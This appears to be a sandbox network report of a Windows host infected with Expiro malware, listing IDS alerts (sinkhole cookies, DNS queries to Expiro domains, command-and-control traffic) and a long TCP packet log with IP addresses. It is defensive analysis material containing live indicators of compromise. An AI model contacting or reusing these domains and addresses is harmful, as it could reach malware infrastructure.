2024-12-31T09:05:09.556816+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.141.10.107	80	192.168.2.4	49742	TCP
2024-12-31T09:05:09.556816+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.141.10.107	80	192.168.2.4	49742	TCP
2024-12-31T09:05:11.324424+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	44.221.84.105	80	192.168.2.4	49745	TCP
2024-12-31T09:05:11.324424+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	44.221.84.105	80	192.168.2.4	49745	TCP
2024-12-31T09:05:11.347551+0100	2051648	ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)	1	192.168.2.4	57418	1.1.1.1	53	UDP
2024-12-31T09:05:14.023229+0100	2051649	ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)	1	192.168.2.4	63397	1.1.1.1	53	UDP
2024-12-31T09:05:20.949994+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49741	132.226.8.169	80	TCP
2024-12-31T09:05:29.912750+0100	2051648	ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)	1	192.168.2.4	51179	1.1.1.1	53	UDP
2024-12-31T09:05:30.561464+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	49757	72.52.178.23	80	TCP
2024-12-31T09:06:04.494974+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	47.129.31.212	80	192.168.2.4	49789	TCP
2024-12-31T09:06:04.494974+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	47.129.31.212	80	192.168.2.4	49789	TCP
2024-12-31T09:06:06.454454+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	13.251.16.150	80	192.168.2.4	49800	TCP
2024-12-31T09:06:06.454454+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	13.251.16.150	80	192.168.2.4	49800	TCP
2024-12-31T09:06:11.794660+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	34.246.200.160	80	192.168.2.4	49841	TCP
2024-12-31T09:06:11.794660+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	34.246.200.160	80	192.168.2.4	49841	TCP
2024-12-31T09:06:12.339406+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	34.227.7.138	80	192.168.2.4	49847	TCP
2024-12-31T09:06:12.339406+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	34.227.7.138	80	192.168.2.4	49847	TCP
2024-12-31T09:06:17.574514+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	35.164.78.200	80	192.168.2.4	49883	TCP
2024-12-31T09:06:17.574514+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	35.164.78.200	80	192.168.2.4	49883	TCP
2024-12-31T09:06:18.396184+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	3.94.10.34	80	192.168.2.4	49891	TCP
2024-12-31T09:06:18.396184+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	3.94.10.34	80	192.168.2.4	49891	TCP
2024-12-31T09:06:24.548434+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.246.231.120	80	192.168.2.4	49927	TCP
2024-12-31T09:06:24.548434+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.246.231.120	80	192.168.2.4	49927	TCP
2024-12-31T09:06:53.680062+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	49938	54.244.188.177	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 09:05:07.060678005 CET	49738	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:07.065944910 CET	80	49738	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:07.066026926 CET	49738	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:07.067162991 CET	49738	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:07.067193985 CET	49738	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:07.072031021 CET	80	49738	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:07.072062016 CET	80	49738	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:07.224433899 CET	49739	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:07.229454994 CET	80	49739	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:07.229536057 CET	49739	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:07.236408949 CET	49739	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:07.236438036 CET	49739	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:07.241312981 CET	80	49739	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:07.241343975 CET	80	49739	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:07.707866907 CET	49741	80	192.168.2.4	132.226.8.169
Dec 31, 2024 09:05:07.712764025 CET	80	49741	132.226.8.169	192.168.2.4
Dec 31, 2024 09:05:07.712865114 CET	49741	80	192.168.2.4	132.226.8.169
Dec 31, 2024 09:05:07.713083029 CET	49741	80	192.168.2.4	132.226.8.169
Dec 31, 2024 09:05:07.717892885 CET	80	49741	132.226.8.169	192.168.2.4
Dec 31, 2024 09:05:07.773703098 CET	80	49738	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:07.773745060 CET	80	49738	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:07.773806095 CET	49738	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:07.947119951 CET	80	49739	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:07.947251081 CET	80	49739	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:07.947325945 CET	49739	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:07.950434923 CET	49739	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:07.955302000 CET	80	49739	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:08.098979950 CET	49742	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:08.103972912 CET	80	49742	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:08.104429007 CET	49742	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:08.113981009 CET	49742	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:08.114059925 CET	49742	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:08.118808985 CET	80	49742	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:08.118868113 CET	80	49742	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:09.464982033 CET	80	49742	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:09.465112925 CET	80	49742	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:09.466778994 CET	49742	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:09.552037954 CET	49742	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:09.556816101 CET	80	49742	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:09.948322058 CET	49744	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:09.953332901 CET	80	49744	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:09.953421116 CET	49744	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:09.960571051 CET	49744	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:09.960571051 CET	49744	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:09.965455055 CET	80	49744	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:09.965467930 CET	80	49744	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:10.745225906 CET	80	49744	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:10.745353937 CET	80	49744	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:10.745409966 CET	49744	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:10.765999079 CET	49744	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:10.770792007 CET	80	49744	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:10.852173090 CET	49745	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:10.857052088 CET	80	49745	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:10.857114077 CET	49745	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:10.862463951 CET	49745	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:10.862483025 CET	49745	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:10.867302895 CET	80	49745	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:10.867382050 CET	80	49745	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:11.315371037 CET	80	49745	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:11.315432072 CET	80	49745	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:11.315510988 CET	49745	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:11.319648027 CET	49745	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:11.324424028 CET	80	49745	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:11.414576054 CET	49746	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:11.419549942 CET	80	49746	72.52.178.23	192.168.2.4
Dec 31, 2024 09:05:11.419631958 CET	49746	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:11.437917948 CET	49746	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:11.438761950 CET	49746	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:11.442756891 CET	80	49746	72.52.178.23	192.168.2.4
Dec 31, 2024 09:05:11.443592072 CET	80	49746	72.52.178.23	192.168.2.4
Dec 31, 2024 09:05:11.945173025 CET	80	49746	72.52.178.23	192.168.2.4
Dec 31, 2024 09:05:12.145049095 CET	49746	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:12.404987097 CET	49747	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:05:12.409782887 CET	80	49747	199.59.243.227	192.168.2.4
Dec 31, 2024 09:05:12.409842014 CET	49747	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:05:12.410016060 CET	49747	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:05:12.414774895 CET	80	49747	199.59.243.227	192.168.2.4
Dec 31, 2024 09:05:12.885021925 CET	80	49747	199.59.243.227	192.168.2.4
Dec 31, 2024 09:05:12.885037899 CET	80	49747	199.59.243.227	192.168.2.4
Dec 31, 2024 09:05:12.885090113 CET	49747	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:05:12.935214996 CET	49746	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:12.935214996 CET	49746	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:12.940216064 CET	80	49746	72.52.178.23	192.168.2.4
Dec 31, 2024 09:05:12.940231085 CET	80	49746	72.52.178.23	192.168.2.4
Dec 31, 2024 09:05:13.078196049 CET	80	49746	72.52.178.23	192.168.2.4
Dec 31, 2024 09:05:13.117108107 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:05:13.122019053 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.122092009 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:05:13.122314930 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:05:13.127098083 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.163503885 CET	49746	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:13.677325964 CET	49738	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:13.783236027 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.783318996 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.783350945 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.783364058 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.783376932 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.783416986 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:05:13.783432007 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.783466101 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:05:13.783466101 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:05:13.783477068 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.783489943 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.783524036 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.783525944 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:05:13.783554077 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.783771992 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:05:13.788309097 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.788338900 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.788348913 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.788362026 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.788391113 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:05:13.788435936 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:05:13.872210979 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.872230053 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:05:13.872334957 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:05:14.143637896 CET	49749	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:14.148523092 CET	80	49749	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:14.148611069 CET	49749	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:14.148864985 CET	49749	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:14.148880005 CET	49749	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:14.153805017 CET	80	49749	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:14.153819084 CET	80	49749	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:15.509002924 CET	80	49749	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:15.509268045 CET	80	49749	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:15.509816885 CET	49749	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:15.509860992 CET	49749	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:15.514668941 CET	80	49749	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:15.705615044 CET	49750	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:15.710474968 CET	80	49750	82.112.184.197	192.168.2.4
Dec 31, 2024 09:05:15.710580111 CET	49750	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:15.711412907 CET	49750	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:15.711412907 CET	49750	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:15.716276884 CET	80	49750	82.112.184.197	192.168.2.4
Dec 31, 2024 09:05:15.716291904 CET	80	49750	82.112.184.197	192.168.2.4
Dec 31, 2024 09:05:19.279946089 CET	80	49741	132.226.8.169	192.168.2.4
Dec 31, 2024 09:05:19.288301945 CET	49741	80	192.168.2.4	132.226.8.169
Dec 31, 2024 09:05:19.293189049 CET	80	49741	132.226.8.169	192.168.2.4
Dec 31, 2024 09:05:20.751298904 CET	80	49741	132.226.8.169	192.168.2.4
Dec 31, 2024 09:05:20.889349937 CET	49752	443	192.168.2.4	188.114.96.3
Dec 31, 2024 09:05:20.889385939 CET	443	49752	188.114.96.3	192.168.2.4
Dec 31, 2024 09:05:20.889446020 CET	49752	443	192.168.2.4	188.114.96.3
Dec 31, 2024 09:05:20.906747103 CET	49752	443	192.168.2.4	188.114.96.3
Dec 31, 2024 09:05:20.906764984 CET	443	49752	188.114.96.3	192.168.2.4
Dec 31, 2024 09:05:20.949994087 CET	49741	80	192.168.2.4	132.226.8.169
Dec 31, 2024 09:05:21.375550985 CET	443	49752	188.114.96.3	192.168.2.4
Dec 31, 2024 09:05:21.375629902 CET	49752	443	192.168.2.4	188.114.96.3
Dec 31, 2024 09:05:21.379527092 CET	49752	443	192.168.2.4	188.114.96.3
Dec 31, 2024 09:05:21.379535913 CET	443	49752	188.114.96.3	192.168.2.4
Dec 31, 2024 09:05:21.379971981 CET	443	49752	188.114.96.3	192.168.2.4
Dec 31, 2024 09:05:21.437731981 CET	49752	443	192.168.2.4	188.114.96.3
Dec 31, 2024 09:05:21.483344078 CET	443	49752	188.114.96.3	192.168.2.4
Dec 31, 2024 09:05:21.549340010 CET	443	49752	188.114.96.3	192.168.2.4
Dec 31, 2024 09:05:21.549586058 CET	443	49752	188.114.96.3	192.168.2.4
Dec 31, 2024 09:05:21.549683094 CET	49752	443	192.168.2.4	188.114.96.3
Dec 31, 2024 09:05:21.559587955 CET	49752	443	192.168.2.4	188.114.96.3
Dec 31, 2024 09:05:22.885032892 CET	80	49747	199.59.243.227	192.168.2.4
Dec 31, 2024 09:05:22.885108948 CET	49747	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:05:22.885189056 CET	49747	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:05:22.889966011 CET	80	49747	199.59.243.227	192.168.2.4
Dec 31, 2024 09:05:26.261219025 CET	49753	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:26.266176939 CET	80	49753	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:26.266254902 CET	49753	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:26.305097103 CET	49753	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:26.305097103 CET	49753	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:26.309994936 CET	80	49753	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:26.310009956 CET	80	49753	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:26.970252037 CET	80	49753	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:26.970331907 CET	80	49753	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:26.970395088 CET	49753	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:26.971338987 CET	49753	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:26.976073980 CET	80	49753	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:27.248224020 CET	49754	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:27.253130913 CET	80	49754	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:27.254829884 CET	49754	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:27.254966974 CET	49754	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:27.255022049 CET	49754	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:27.259823084 CET	80	49754	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:27.259835005 CET	80	49754	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:28.643241882 CET	80	49754	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:28.643347025 CET	80	49754	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:28.643399000 CET	49754	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:28.644361019 CET	49754	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:05:28.649141073 CET	80	49754	18.141.10.107	192.168.2.4
Dec 31, 2024 09:05:28.712410927 CET	49755	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:28.717291117 CET	80	49755	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:28.717371941 CET	49755	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:28.717487097 CET	49755	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:28.717533112 CET	49755	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:28.722219944 CET	80	49755	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:28.722249031 CET	80	49755	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:29.413979053 CET	80	49755	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:29.414067030 CET	80	49755	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:29.414151907 CET	49755	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:29.415143967 CET	49755	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:05:29.420001030 CET	80	49755	54.244.188.177	192.168.2.4
Dec 31, 2024 09:05:29.449506998 CET	49756	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:29.454339027 CET	80	49756	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:29.454426050 CET	49756	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:29.455081940 CET	49756	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:29.455107927 CET	49756	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:29.459829092 CET	80	49756	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:29.459851027 CET	80	49756	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:29.910830975 CET	80	49756	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:29.910878897 CET	80	49756	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:29.910933971 CET	49756	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:29.911045074 CET	49756	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:05:29.915791035 CET	80	49756	44.221.84.105	192.168.2.4
Dec 31, 2024 09:05:29.930716991 CET	49757	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:29.935607910 CET	80	49757	72.52.178.23	192.168.2.4
Dec 31, 2024 09:05:29.935731888 CET	49757	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:29.935894012 CET	49757	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:29.935916901 CET	49757	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:29.940670967 CET	80	49757	72.52.178.23	192.168.2.4
Dec 31, 2024 09:05:29.940682888 CET	80	49757	72.52.178.23	192.168.2.4
Dec 31, 2024 09:05:30.518603086 CET	80	49757	72.52.178.23	192.168.2.4
Dec 31, 2024 09:05:30.561464071 CET	49757	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:05:37.080442905 CET	80	49750	82.112.184.197	192.168.2.4
Dec 31, 2024 09:05:37.080579042 CET	49750	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:37.081573009 CET	49750	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:37.086400032 CET	80	49750	82.112.184.197	192.168.2.4
Dec 31, 2024 09:05:37.346085072 CET	49758	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:37.351035118 CET	80	49758	82.112.184.197	192.168.2.4
Dec 31, 2024 09:05:37.351108074 CET	49758	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:37.351835012 CET	49758	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:37.351850986 CET	49758	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:37.356687069 CET	80	49758	82.112.184.197	192.168.2.4
Dec 31, 2024 09:05:37.356713057 CET	80	49758	82.112.184.197	192.168.2.4
Dec 31, 2024 09:05:38.889750957 CET	49758	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:39.049119949 CET	49759	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:39.054069996 CET	80	49759	82.112.184.197	192.168.2.4
Dec 31, 2024 09:05:39.054598093 CET	49759	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:39.054828882 CET	49759	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:39.054912090 CET	49759	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:05:39.059623003 CET	80	49759	82.112.184.197	192.168.2.4
Dec 31, 2024 09:05:39.059668064 CET	80	49759	82.112.184.197	192.168.2.4
Dec 31, 2024 09:05:39.577019930 CET	49757	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:00.439925909 CET	80	49759	82.112.184.197	192.168.2.4
Dec 31, 2024 09:06:00.439990997 CET	49759	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:06:00.440033913 CET	49759	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:06:00.444780111 CET	80	49759	82.112.184.197	192.168.2.4
Dec 31, 2024 09:06:00.552651882 CET	49773	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:06:00.557425022 CET	80	49773	82.112.184.197	192.168.2.4
Dec 31, 2024 09:06:00.557486057 CET	49773	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:06:00.557631969 CET	49773	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:06:00.557656050 CET	49773	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:06:00.562422991 CET	80	49773	82.112.184.197	192.168.2.4
Dec 31, 2024 09:06:00.562433958 CET	80	49773	82.112.184.197	192.168.2.4
Dec 31, 2024 09:06:02.892822027 CET	49773	80	192.168.2.4	82.112.184.197
Dec 31, 2024 09:06:03.094069004 CET	49789	80	192.168.2.4	47.129.31.212
Dec 31, 2024 09:06:03.100090027 CET	80	49789	47.129.31.212	192.168.2.4
Dec 31, 2024 09:06:03.100327015 CET	49789	80	192.168.2.4	47.129.31.212
Dec 31, 2024 09:06:03.100650072 CET	49789	80	192.168.2.4	47.129.31.212
Dec 31, 2024 09:06:03.100662947 CET	49789	80	192.168.2.4	47.129.31.212
Dec 31, 2024 09:06:03.105444908 CET	80	49789	47.129.31.212	192.168.2.4
Dec 31, 2024 09:06:03.105456114 CET	80	49789	47.129.31.212	192.168.2.4
Dec 31, 2024 09:06:04.471400023 CET	80	49789	47.129.31.212	192.168.2.4
Dec 31, 2024 09:06:04.471554041 CET	80	49789	47.129.31.212	192.168.2.4
Dec 31, 2024 09:06:04.471602917 CET	49789	80	192.168.2.4	47.129.31.212
Dec 31, 2024 09:06:04.490202904 CET	49789	80	192.168.2.4	47.129.31.212
Dec 31, 2024 09:06:04.494973898 CET	80	49789	47.129.31.212	192.168.2.4
Dec 31, 2024 09:06:05.004793882 CET	49800	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:05.009690046 CET	80	49800	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:05.009742022 CET	49800	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:05.049498081 CET	49800	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:05.049525023 CET	49800	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:05.054305077 CET	80	49800	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:05.054316998 CET	80	49800	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:06.433348894 CET	80	49800	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:06.433387041 CET	80	49800	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:06.433454037 CET	49800	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:06.449701071 CET	49800	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:06.454453945 CET	80	49800	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:07.042016983 CET	49811	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:07.046838045 CET	80	49811	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:07.046936035 CET	49811	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:07.071906090 CET	49811	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:07.071949959 CET	49811	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:07.077157021 CET	80	49811	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:07.077168941 CET	80	49811	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:07.499385118 CET	80	49811	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:07.499532938 CET	80	49811	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:07.499589920 CET	49811	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:07.501940966 CET	49811	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:07.506767988 CET	80	49811	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:07.634212017 CET	49816	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:06:07.639134884 CET	80	49816	18.141.10.107	192.168.2.4
Dec 31, 2024 09:06:07.641972065 CET	49816	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:06:07.642390013 CET	49816	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:06:07.642425060 CET	49816	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:06:07.647228003 CET	80	49816	18.141.10.107	192.168.2.4
Dec 31, 2024 09:06:07.647238016 CET	80	49816	18.141.10.107	192.168.2.4
